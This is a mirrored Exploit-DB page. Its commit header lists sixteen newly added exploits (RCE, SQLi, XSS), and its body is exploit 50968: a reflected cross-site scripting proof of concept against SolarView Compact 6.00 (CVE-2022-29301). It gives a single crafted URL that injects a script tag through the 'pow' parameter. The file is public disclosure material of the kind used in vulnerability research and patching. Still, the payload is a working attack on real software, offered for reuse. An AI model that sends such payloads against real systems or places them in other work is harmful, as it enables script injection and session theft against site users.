bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/50968.txt
Offensive Security 29e275db94 DB: 2022-06-15 
16 changes to exploits/shellcodes

Real Player v.20.0.8.310 G2 Control - 'DoGoToURL()' Remote Code Execution (RCE)
Real Player 16.0.3.51 - 'external::Import()' Directory Traversal to Remote Code Execution (RCE)
HP LaserJet Professional M1210 MFP Series Receive Fax Service - Unquoted Service Path
Marval MSM v14.19.0.12476 - Remote Code Execution (RCE) (Authenticated)
Virtua Software Cobranca 12S - SQLi
Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF)
Algo 8028 Control Panel - Remote Code Execution (RCE) (Authenticated)
TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated)
Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)
Avantune Genialcloud ProJ 10 - Cross-Site Scripting (XSS)
Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated)
phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated)
ChurchCRM 4.4.5 - SQLi
Old Age Home Management System 1.0 - SQLi Authentication Bypass
SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting (XSS)
SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS)
2022-06-15 05:01:57 +00:00

12 lines
No EOL
428 B
Text
Raw Permalink Blame History

# Exploit Title: SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS)
# Date: 2022-05-15
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: ver.6.00
# Vendor home page : https://www.contec.com/
# Authentication Required: No
# CVE : CVE-2022-29301
# Tested on: Windows
# Proof Of Concept:
http://IP_ADDRESS/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(9)%3C/script%3E%3C%22&bgcolor=green
Reference in a new issue View git blame Copy permalink